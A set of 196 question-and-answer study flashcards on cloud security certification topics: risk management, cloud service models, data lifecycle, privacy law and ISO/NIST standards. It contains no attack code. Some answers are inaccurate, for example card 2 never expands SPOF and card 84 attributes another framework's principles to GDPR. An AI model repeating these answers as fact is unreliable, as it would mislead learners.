Study Guide Flashcards
(196 cards)
1
Q
What is Business Impact Analysis (BIA)?
A
A process that assesses and identifies the potential effects of disruptions to a business operation.
2
Q
What does SPOF stand for?
A
A component or system that, if it fails, will cause the entire system to fail.
3
Q
What is Quantitative risk assessment?
A
Risk assessment that uses specific numerical values.
4
Q
What is Qualitative risk assessment?
A
Risk assessment that uses non-numerical categories that are relative in nature, such as high, medium, and low.
5
Q
What is risk appetite?
A
Level, amount, or type of risk that the organization finds acceptable.
6
Q
What is residual risk?
A
The remaining risk that exists after countermeasures have been applied.
7
Q
What is IaaS?
A
Service model where cloud customer has the most responsibility and authority. Cloud provider is only liable for the underlying hardware.
8
Q
What is PaaS?
A
Service model where cloud customer loses more control because the cloud provider is responsible for installing, maintaining, and administering the OS as well as underlying hardware.
9
Q
What is SaaS?
A
Service model where cloud customer loses all control of the environment. Cloud provider is responsible for all of the underlying hardware and software.
10
Q
What is homomorphic encryption?
A
A method of processing data in the cloud while it remains encrypted.
11
Q
What is defense in depth?
A
A security strategy that involves implementing multiple overlapping layers of security measures to protect an environment.
12
Q
Who is the data owner?
A
Organization that has collected or created the data.
13
Q
What is a data custodian?
A
Person or entity that is tasked with the daily maintenance and administration of the data.
14
Q
What is a data processor?
A
Any org or person who manipulates, stores, or moves the data on behalf of the data owner.
15
Q
What is data discovery?
A
The process of creating an inventory or conducting e-discovery to identify and locate data.
16
Q
What is label-based discovery?
A
A data discovery method that is aided by labels created by the data owner.
17
Q
What is metadata-based discovery?
A
A data discovery method that involves discovering data using metadata traits and characteristics.
18
Q
What is content-based discovery?
A
Refers to finding information or resources based on their characteristics, attributes, or content rather than relying on predefined keywords or categories.
19
Q
What is structured data?
A
Data that is organized and formatted in a way that is easily searchable and can be processed by computers.
20
Q
What is unstructured data?
A
Qualitative data; natural-language text; incorporate media (audio, video, images); contains JSON, XML, binary objects (images encoded as text strings); important for data analytic strategies; NoSQL.
21
Q
What is IRM (Information Rights Management)?
A
A set of controls and technologies used to protect certain types of assets, such as intellectual property or sensitive information.
22
Q
What is copyright?
A
Legal protection for expressions of ideas, such as literary, artistic, or musical works.
23
Q
What is DMCA (Digital Millennium Copyright Act)?
A
Legislation that provides additional protections for creative works in digital formats.
24
Q
What are trademarks?
A
Legal protection for specific words, phrases, symbols, or designs that distinguish a product or service.
25
What is a patent?
A grant of exclusivity that gives the holder the right to produce, sell, and import an invention.
26
What is PKI (Public Key Infrastructure)?
A framework for secure communication using cryptographic techniques, such as digital certificates and public-private key pairs.
27
What is file-based storage?
A method of storing data as files and folders, similar to how data is organized on a traditional file system.
28
What is block storage?
Allocates a large chunk of storage for access as a disk volume managed by the operating system.
29
What is object storage?
Stores files as individual objects managed by the cloud service provider.
30
What is a CDN?
A system that caches commonly requested content in geographically distributed servers to improve performance and reduce latency.
31
What is transparent encryption?
A form of encryption where the encryption key is stored on the same data store.
32
What is randomization?
The process of replacing data with random characters to make it less predictable and harder to decipher.
33
What is hashing?
The process of creating a unique fixed-size string, called a hash, from an input data using a cryptographic function.
34
What is shuffling?
A technique that involves using different entries from the same dataset to represent data, making it harder to identify specific data points.
35
What is masking?
A method of hiding sensitive data by replacing it with useless characters or symbols.
36
What is SIEM?
A tool or system that allows for the monitoring, analysis, and management of security events and information within an organization.
37
What is DLP?
A set of tools and processes designed to protect sensitive information from unauthorized access, sharing, or loss.
38
What is a private cloud?
A distributed computing environment that is dedicated to a single customer or organization.
39
What is a community cloud?
A cloud computing model where resources are shared among a specific affinity group or community.
40
What is portability?
The ease or difficulty of transferring data out of a cloud provider's data center to another environment or provider.
41
What is vendor lock-in?
A situation where a cloud provider uses proprietary data formats or mediums, making it difficult for a customer to switch to another provider.
42
What is vendor lock-out?
The inability to access and recover data due to issues or disputes with a cloud provider.
43
What is a hybrid cloud?
A cloud computing model that combines two or more other cloud models, such as private, public, or community clouds.
44
What is a honeypot?
A security tool or system that is used to distract and analyze potential attacks, allowing organizations to gather information about attackers and their methods.
45
What is a vulnerability assessment?
The process of scanning a network or system to identify known vulnerabilities and weaknesses.
46
What is a zero-day vulnerability?
A vulnerability that is unknown to the software vendor or developer, and for which no patch or fix has been released.
47
What is ISO/IEC 27034-1?
ISO Standard for secure application development.
48
What is the Organization Normative Framework (ONF)?
A framework that defines application security controls and best practices.
49
What are Application Normative Frameworks (ANF)?
Subset of the Organization Normative Framework (ONF) that focuses on specific applications.
50
What is Transport Layer Security (TLS)?
A protocol that provides secure communication between applications over a network, ensuring the confidentiality and integrity of data.
51
What is Secure Socket Layer (SSL)?
A cryptographic protocol that is used to encrypt data transmissions between endpoints, such as a web browser and a web server.
52
What is Whole-Disk Encryption?
The process of encrypting the entire disk or storage volume, ensuring that all data stored on it remains encrypted.
53
What is Volume Encryption?
The process of encrypting a specific partition or volume on a hard drive, providing protection for the data stored on that partition.
54
What is Cross-Site Scripting (XSS)?
A type of application vulnerability that allows untrusted data to be included in web pages without proper validation, potentially leading to malicious code execution.
55
What is Injection?
A type of attack where a malicious user injects a string or code into an application to manipulate its behavior or gain unauthorized access.
56
What is Cross-Site Request Forgery (CSRF)?
An attack that manipulates a logged-on user's browser to send a forged HTTP request along with cookies to generate a request that a vulnerable application thinks is legitimate.
57
What is White-Box Testing (SAST)?
A form of application testing that provides the tester with complete knowledge of the application being tested, including access to source code and design documents.
58
What is Black-Box Testing (DAST)?
A form of application testing that is performed with no knowledge of a system's internals.
59
What is an API?
Allows other applications to consume web services and interact with a software system.
60
What is Nonrepudiation?
No party to a transaction can later claim that they did not take part.
61
What is AICPA?
The national professional organization of Certified Public Accountants in the United States.
62
What is ISO 31000:2009?
Risk Management guide and framework (RMF) to design and implement a risk management program.
63
What are the principles of ISO 31000:2009?
11 principles: Protect value, all aspects of organization, part of all org decisions, RM mitigates uncertainty, integrated efficiently with processes, uses accurate data, tailored to business needs, include human elements, transparent, flexible, continual improvements.
64
What is NIST SP 800-37?
Risk Management Framework.
65
What is the CSA STAR program?
A program developed by the Cloud Security Alliance (CSA) that provides a framework for evaluating the security of cloud service providers.
66
What is the data lifecycle?
The complete process of creating, storing, using, sharing, archiving, and eventually destroying data.
67
What is data categorization?
The process of classifying data based on the responsibility of the data owner and the level of protection required.
68
What are crypto keys?
Encryption keys used to protect data, which are not recommended to be stored with the cloud provider to ensure better security.
69
What is a regulator?
Create rules governing use of cloud computing.
70
What is transference in risk management?
A risk management strategy that involves transferring or sharing the responsibility for managing risks with another party, such as an insurance provider.
71
What is Critique in the context of copyright?
An exception to fair-use for copyrighted material, allowing for limited use of copyrighted works for criticism or review purposes.
72
What is Anonymization?
A technique used to obscure or de-identify data in the cloud, removing personally identifiable information to protect privacy.
73
What is a Secure Logical Framework?
A set of operating requirements and best practices for ensuring the security of systems and networks.
74
What is Data at rest?
Data that is stored and encrypted in a cloud environment, ensuring its security even when it is not actively being used or accessed.
75
What is the Cloud-Secure Software Deployment Lifecycle (SDLC)?
The process of developing and deploying cloud applications while ensuring their security at every stage of the software development lifecycle.
76
What is Threat Modeling?
A process of describing and analyzing potential threats to an application or system based on their attributes, such as their capabilities and motivations.
77
What does Industry Standard 5 9's refer to?
A term used to describe the level of uptime and availability required for critical operations, which is 99.999%.
78
What is UI Tier 1?
UI tier that includes uninterruptible power supply (UPS), cooling systems, and power generators with a minimum of 12 hours of fuel.
79
What is UI Tier 2?
UI tier that ensures critical operations are not interrupted during scheduled replacement or maintenance activities.
80
What is UI Tier 3?
UI tier that includes dual power supplies for all IT systems, providing redundancy and ensuring continuous operation.
81
What is UI Tier 4?
UI tier that includes redundancy in both IT and electrical systems, providing the highest level of fault tolerance and availability.
82
What is Initial training?
A category of security training delivery that focuses on providing basic knowledge and skills to employees or users at the beginning of their engagement with an organization.
83
What is FedRAMP?
A US federal program that mandates standardized approach to security assessments, authorization, and continuous monitoring of cloud products/services.
84
What are the GDPR Principles?
Notice, Choice, Purpose, Access, Integrity, Security, and Enforcement, which govern the processing of personal data.
85
What is Canadian PIPEDA?
A Canadian privacy law that governs the collection, use, and disclosure of personal information.
86
What is the APEC Privacy Framework?
A privacy framework developed by the Asia-Pacific Economic Cooperation (APEC) that provides guidelines for protecting privacy and personal information.
87
What is the Australian Privacy Act?
A privacy law in Australia that regulates the handling of personal information by Australian government agencies and organizations.
88
What is ISO/IEC 27017:2015?
Guide for cloud information security controls.
89
What is ISO/IEC 27001?
Standard for the establishment, implementation, control, and improvement of the Information Security Management System (ISMS).
90
What is NIST 800-92?
A standard published by the National Institute of Standards and Technology (NIST) that provides guidance for log management and analysis.
91
What is Gap Analysis?
Involves assessing the difference between the current state of a system, process, or organization and its desired future state. It identifies areas where improvements or changes are needed to achieve specific goals.
92
Who is ultimately legally liable for any loss of data in the cloud?
The cloud customer is always ultimately legally liable for any loss of data. This is true even if the cloud provider demonstrates negligence or malice.
93
What are the 6 Steps in the Cloud Data Lifecycle?
1. Create 2. Store 3. Use 4. Share 5. Archive 6. Destroy
94
What is the responsibility of the data owner during the create phase?
Data categorization and classification are up to the responsibility of the data owner.
95
What is the preferred upload method to the cloud?
IPSec or TLS (1.2 or higher) VPN solution.
96
What should not be stored with the cloud provider?
It's NOT recommended to store crypto keys with the cloud provider whether the cloud customer chooses to use a CASB or other means of key management.
97
What service model do Personnel Threats, External Threats, and Lack of Specific Skillsets apply to?
IaaS.
98
What service model do Interoperability Issues, Persistent Backdoors, Virtualization, and Resource Sharing apply to?
PaaS.
99
What service model do Proprietary Formats, Virtualization, and Web Application Security apply to?
SaaS.
100
What is a potential emergent business impact analysis (BIA) concern?
New dependencies.
101
What is an Internal Audit?
Audit performed by employees of the organization.
102
What is an External Audit?
Audit performed by auditors outside of the organization.
103
What is Audit Preparation?
Parameters that are discussed and negotiated prior to the start of the audit.
104
What is SOC 1?
SOC Report type: strictly for auditing the financial reporting instruments of a corporation.
105
What is SOC 2?
SOC Report type: Intended to report audits of any controls on an organization's security, availability, processing integrity, confidentiality, and privacy.
106
What is SOC 3?
SOC Report type: Designed to be shared with the public. Seal of approval. Does not contain any actual data about the security controls of the audit target.
107
What should data at rest be?
Data at rest should be encrypted.
108
What is the Defining phase in SDLC?
SDLC Phase focused on identifying the business requirements of the application, such as accounting, database, or customer relationship management.
109
What is the Designing phase in SDLC?
SDLC Phase: Begin to develop user stories (what the user will want to accomplish, what interface will look like and whether it will require the use or development of any APIs).
110
What is the Development phase in SDLC?
SDLC Phase where the code is written.
111
What is the Testing phase in SDLC?
SDLC Phase where activities such as initial pen testing and vulnerability scanning against the application are performed. Will use both dynamic and static testing or DSAT (Dynamic Application Security Testing) or SAST (Static Application Security Testing).
112
What is the Secure Operations phase in SDLC?
SDLC Phase where after testing, the application is deemed secure.
113
What is the Disposal phase in SDLC?
SDLC Phase where app has reached end of life or has been replaced with a newer or different application.
114
What does STRIDE stand for?
S (Spoofing) T (Tampering) R (Repudiation) I (Information Disclosure) D (Denial of Service) E (Elevation of Privilege).
115
What does the Graham-Leach-Bliley Act (GLBA) allow?
It allows banks to merge with and own insurance companies while ensuring customer account information is kept secure and private.
116
What is the purpose of the Sarbanes-Oxley Act (SOX)?
It increases transparency into publicly traded corporations' financial activities.
117
What does HIPAA protect?
It protects patient records and data.
118
What does FERPA prevent?
It prevents academic institutions from sharing student data with anyone other than parents or students (after age 18).
119
What does the DMCA do?
It includes provisions to protect owned data and makes cracking access controls on copyrighted media a crime.
120
What does the CLOUD Act allow?
It allows US law enforcement and courts to compel American companies to disclose data stored in foreign data centers.
121
What is GDPR?
It is the most significant personal privacy law in the world, governing the handling of personal information of EU citizens.
122
What is crypto-shredding?
It is the practice of deleting data by deliberately deleting or overwriting the encryption keys.
123
What is degaussing?
It is the destruction of data on a storage device by removing its magnetism.
124
What is a hypervisor?
It is a program used to run and manage one or more virtual machines on a computer.
125
What is orchestration in a virtualized environment?
It is the automatic provisioning, configuring, and managing of virtual machines and other resources.
126
What is key escrow?
It allows cryptographic secrets to be held securely for recovery by authorized parties.
127
What is geofencing?
It is the process of setting virtual boundaries to target people entering a certain area.
128
What is a toolkit in BC/DR?
It is a secure container with all necessary documentation and resources for a proper response action.
129
What is secrets management?
It allows developers to securely store sensitive data such as passwords and tokens in a secure environment.
130
What are virtualization toolsets?
They provide additional functionality like improved networking or video output for a guest operating system.
131
What is the control plane in networking?
It controls how data packets are forwarded in a network.
132
What is the data plane in networking?
It is responsible for forwarding network packets between source and destination devices.
133
What is a vulnerability scan?
It is the process of identifying security weaknesses and flaws in systems and software.
134
What is Availability Management (AM)?
It ensures that IT services are available at the required level through proactive and reactive measures.
135
What is Release Management (RM)?
It involves planning, scheduling, and controlling the movement of releases to test and live environments.
136
What is Incident Management (IM)?
It restores normal service operations as quickly as possible after an incident.
137
What is Problem Management (PM)?
It identifies and addresses the root cause of incidents to prevent recurrence.
138
What is Recovery Point Objective (RPO)?
It indicates the maximum acceptable data loss and the point in time to which systems must be recovered.
139
What is Recovery Time Objective (RTO)?
It is the targeted duration within which a business process must be restored after a disruption.
140
What is Capacity Management?
It ensures that IT infrastructure has adequate resources to meet current and future demands.
141
What is access control?
It is a system that controls access to information or functionality.
142
What is a reverse proxy?
It is a server that acts on behalf of other servers, forwarding client requests.
143
What is a CASB (Cloud Access Security Broker)?
It is a third-party entity offering independent IAM services to CSPs and cloud customers.
144
What is a Hardware Security Module (HSM)?
It is a dedicated device for secure key management and cryptographic operations.
145
What is an Identity Provider (IdP)?
It is a system that authenticates users and provides access tokens.
146
What is the Management Plane?
It allows an admin to remotely manage a fleet of servers and configure cloud resources.
147
What is NIC Teaming?
It combines multiple network interface cards into a single logical interface.
148
What is Distributed Resource Scheduling?
It allocates and manages resources across multiple nodes in distributed systems.
149
What is a Controlled Entry Point?
It is a designated access location regulated for security.
150
What does the CLOUD Act require?
It mandates US companies to provide federal officials with data stored abroad.
151
What is avoidance in risk management?
It involves changing business practices to eliminate potential enterprise risk.
152
What is transference in risk management?
It shifts the risk to another party, typically through insurance.
153
What is acceptance in risk management?
It acknowledges and lives with the risk without intervention.
154
What is mitigation in risk management?
It reduces the impact or likelihood of a risk through proactive measures.
155
What is a Master Service Agreement (MSA)?
It sets the terms for a long-term relationship between two parties.
156
What is a Nondisclosure Agreement (NDA)?
It ensures that one party does not disclose certain confidential information.
157
What is a Business Partnership Agreement (BPA)?
It outlines the terms and responsibilities of a business partnership.
158
What is a Service Level Agreement (SLA)?
It specifies the agreed-upon levels of service between a provider and a client.
159
What is the ECPA (Electronic Communication Privacy Act)?
It restricts the government from wiretapping phone calls and electronic communication.
160
What does the GLBA ensure?
It ensures customer account information is kept secure and private.
161
What does SOX include?
It includes provisions for securing data and protecting shareholders from accounting errors.
162
What is the CCM (Cloud Controls Matrix)?
It is a list of security controls appropriate for cloud environments, cross-referenced to other frameworks.
163
What is a tightly coupled cluster?
It has all storage devices directly connected to a shared physical backplane.
164
What is a loosely coupled cluster?
It allows greater flexibility with each node being independent.
165
What is a cloud broker?
It purchases hosting services from a provider and resells them to customers.
166
What is data mapping?
It normalizes and translates data between organizations to make it meaningful.
167
What is data labeling?
It involves creating, categorizing, and classifying data by the owner.
168
What is horizontal scaling?
It involves adding more servers to meet increased demand.
169
What is vertical scaling?
It involves adding more resources to existing servers to meet increased demand.
170
What is a cloud service provider?
It offers cloud computing services for sale to third parties.
171
What is a cloud customer?
It purchases cloud computing services from cloud service providers.
172
What is a cloud service partner?
It provides add-on services to cloud customers.
173
What is rapid elasticity?
It allows computing resources to be rapidly provisioned or adjusted to meet user demand.
174
What is measured service?
It charges for cloud resources based on the amount used.
175
What is multitenancy?
It allows customers to share computing resources.
176
What is resource pooling?
It involves sharing CPU and memory among users.
177
What is a Type 1 hypervisor?
It runs directly on hardware without an underlying OS, used for server virtualization.
178
What is a Type 2 hypervisor?
It requires a host OS and runs as a software layer on top of it.
179
What is VM sprawl?
It leads to unused and unmaintained servers.
180
What is ephemeral computing?
It allocates resources for a short time.
181
What is application virtualization?
It streams applications to the user's desktop.
182
What is machine learning?
It enables computers to learn and make predictions without explicit programming.
183
What is artificial intelligence?
It refers to computer systems performing tasks that typically require human intelligence.
184
Common criteria assurance framework.
ISO/IEC 15408-1:2009
185
A NIST document that lists accredited and outmoded cryptosystems.
FIPS 140-2
186
Overview and vocabulary for cloud computing.
ISO/IEC 17788
187
Guide for collecting and identifying digital evidence.
ISO/IEC 27037:2012
188
Guide for incident investigations.
ISO/IEC 27041:2015
189
Guide for digital evidence analysis.
ISO/IEC 27042:2015
190
Principles and process for incident investigation.
ISO/IEC 27043:2015
191
Overview and process for eDiscovery.
ISO/IEC 27050-1:2016
192
Standards for cloud privacy.
ISO/IEC 27018
193
Definition for cloud computing.
NIST 800-145
194
Guide for the security requirements for the U.S. federal government information systems.
NIST 800-53
195
Guide for cryptographic erasure.
NIST SP 800-88
196
Defines personal identifiable information (PII)
NIST SP 800-122
